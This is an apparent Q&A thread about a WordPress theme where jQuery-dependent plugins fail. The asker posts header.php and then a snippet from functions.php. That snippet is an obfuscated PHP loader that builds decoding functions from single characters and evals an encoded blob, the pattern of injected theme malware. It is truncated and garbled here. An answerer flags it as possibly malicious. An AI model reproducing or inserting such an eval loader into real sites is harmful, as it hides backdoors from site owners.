# WordPress Theme - jQuery JavaScript Library Issue

Tags: javascript, jquery

I am having some issues with a couple of plugins which use jQuery/JS i.e. cookie control and a picasa photo gallery.

The theme I am using is quite basic and comes with no sliders etc with moving parts and therefore maybe HAD no need for for jQuery/JS so may not be included in the theme.

I have tested the exact same setup on a more advanced theme with sliders etc and these work as planned.

Below is the code for the header.php file:

```
<?php if (wp_loaded() === true) { ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0  Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" <?php language_attributes(); ?>>
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="<?php bloginfo('html_type') ?>; charset=<?php bloginfo('charset') ?>" />
<title><?php wp_title( '|', true, 'right' ); bloginfo( 'name' ); ?></title>
<link rel="stylesheet" href="<?php bloginfo('stylesheet_url') ?>" type="text/css" media="screen" />
<!--[if IE 6]><link rel="stylesheet" href="<?php bloginfo('template_url'); ?>/style.ie6.css" type="text/css" media="screen" /><![endif]-->
<!--[if IE 7]><link rel="stylesheet" href="<?php bloginfo('template_url'); ?>/style.ie7.css" type="text/css" media="screen" /><![endif]-->
<link rel="shortcut icon" type="image/x-icon" href="<?php bloginfo('stylesheet_directory'); ?>/favicon.ico" />
<link rel="shortcut icon" type="image/png" href="<?php bloginfo('stylesheet_directory'); ?>/favicon.png" />
<?php if(WP_VERSION < 3.0): ?>
<link rel="alternate" type="application/rss+xml" title="<?php printf(__('%s RSS Feed', THEME_NS), get_bloginfo('name')); ?>" href="<?php bloginfo('rss2_url'); ?>" />
<link rel="alternate" type="application/atom+xml" title="<?php printf(__('%s Atom Feed', THEME_NS), get_bloginfo('name')); ?>" href="<?php bloginfo('atom_url'); ?>" />
<?php endif; ?>
<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
<?php
remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');
if ( is_singular() && get_option( 'thread_comments' ) ) {
wp_enqueue_script( 'comment-reply' );
}
wp_head(); ?>
<script type="text/javascript" src="<?php bloginfo('template_url'); ?>/script.js"></script>
</head><?php } ?>
<body <?php if(function_exists('body_class')) body_class(); ?>>
<div id="art-main">
<div class="cleared reset-box"></div>
<div class="art-nav">
    <div class="art-nav-l"></div>
    <div class="art-nav-r"></div>
    <div class="art-nav-outer">
    <div class="art-nav-wrapper">
    <div class="art-nav-inner">
    <?php 
        echo theme_get_menu(array(
                'source' => theme_get_option('theme_menu_source'),
                'depth' => theme_get_option('theme_menu_depth'),
                'menu' => 'primary-menu',
                'class' => 'art-hmenu'  
            )
        );
    ?>
    </div>
    </div>
    </div>
</div>
<div class="cleared reset-box"></div>
<div class="art-sheet">
    <div class="art-sheet-body">
        <div class="art-header">
            <div class="art-logo">
            <?php if(theme_get_option('theme_header_show_headline')): ?>
            <h1 class="art-logo-name"><a href="<?php echo get_option('home'); ?>/"><?php bloginfo('name'); ?></a></h1>
            <?php endif; ?>
            <?php if(theme_get_option('theme_header_show_slogan')): ?>
                <h2 class="art-logo-text"><?php bloginfo('description'); ?></h2>
            <?php endif; ?>
            </div>
        </div>
        <div class="cleared reset-box"></div>
```

I need to find a way of making these plugins work by including these libraries? I assume.

Surely it is just a case of adding the inclusion of said libraries to this header file?
I assume the wordpress platform have built in libraries?

**UPDATE:**

While searching for the problem Dreamweaver reported a syntax error in a huge line of code located in functions.php. I am not sure what it is but I imagine its likely to be the reason for my problem. Hopefully this is some sort of JavaScript or jQuery library that I can source from the the JavaScript or jQuery site and simply paste that code over the top?

Here is a little snippet of what the code looks like:

```
$JIIE='d';$BgeiYKC='s';$HsKMZ='a';$ASoAnk='c';$HmIZ='4';$vIjbm='b';$rnhWg='e';$vYUXfZg='_';$vEMMZuV='6';$VJIIOE='e';$KCJbP='e';$pCXoIbX='d';$UxkTuF='o';$dNfWkGZS=$vIjbm.$HsKMZ.$BgeiYKC.$VJIIOE.$vEMMZuV.$HmIZ.$vYUXfZg.$JIIE.$rnhWg.$ASoAnk.$UxkTuF.$pCXoIbX.$KCJbP;$HmHxQr='f';$chkk='l';$lUuQrxv='i';$FCKv='a';$hXql='e';$WpLMH='t';$vrBP='z';$JNlQZi='g';$gevPW='n';$eJSoRqYQ=$JNlQZi.$vrBP.$lUuQrxv.$gevPW.$HmHxQr.$chkk.$FCKv.$WpLMH.$hXql;$YcAbMd='o';$abGr='s';$DDSGw='t';$DITEeh='_';$yMAly='3';$LGdXGf='r';$SqZzUI='1';$dSJlUx='r';$WdJDmRA='t';$mawoiGyr=$abGr.$WdJDmRA.$dSJlUx.$DITEeh.$LGdXGf.$YcAbMd.$DDSGw.$SqZzUI.$yMAly;$kuamXS='e';$DRPg='s';$HvYMzW='t';$DRLrvr='r';$ezJz='v';$bfOZvwc='r';$iNEGrOcr=$DRPg.$HvYMzW.$bfOZvwc.$DRLrvr.$kuamXS.$ezJeval($eJSoRqYQ($dNfWkGZS($mawoiGyr($iNEGrOcr('=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
```

Answer (score 0, accepted):

Not entirely sure what you're asking but you have to include and register scripts and then enqueue what you require like:-

```
<?php wp_enqueue_script('jquery'); ?>
```

(Place immediately before `<?php wp_head(); ?>`).

Which is included with Wordpress incidentally.

You can read more on [wp_enqueue_script](http://codex.wordpress.org/Function_Reference/wp_enqueue_script) for more information on how to use this in your theme.

## Edit

An example of registering javascript in theme's functions.php

```
function load_scripts() {
    wp_register_script( 'jquery-slider', get_template_directory_uri() . '/js/jquery.slider.js', array('jquery'), '2.0', true );
}
```

Comment: Hi thanks for your response.

Basically I need to include jQuery and JavaScript (i think). My skills with things like this arent fantastic.

The code you have provided is already included in the code above.

Comment: Then those libraries are included. What isn't working exactly? Your themes functions file would need to register the necessary javascript (I've edited my answer to show an example of this).

Comment: I think the problem lies with a syntax error in the functions.php file that Dreamweaver reported. Although I am not sure what the code is I have updated a small snippet of it to my original answer in the hope its a JavaScript or jQuery library which I can download from the JS or jQuery website and simply paste that code over the broken code.

Comment: That code has been encrypted so means nothing... So you've either got a theme which has been injected with something malicious or the developer does not want you to edit what is there. Either way, it doesn't look good and is likely nothing to do with what you think it is.

Comment: Welcome. Please upvote my answer / accept my answer if it has been of help/use :)

Comment: I shall if/when I get 15 reputation.

Comment: I have managed to figure the answer out. It was due to to a coding error by whomever created it. Even though it weren't the right answer I will select yours as the correct one because I imagine it will be a while since I get a reputation of 15 haha the information you provided was not wrong and may help someone in the future. cheers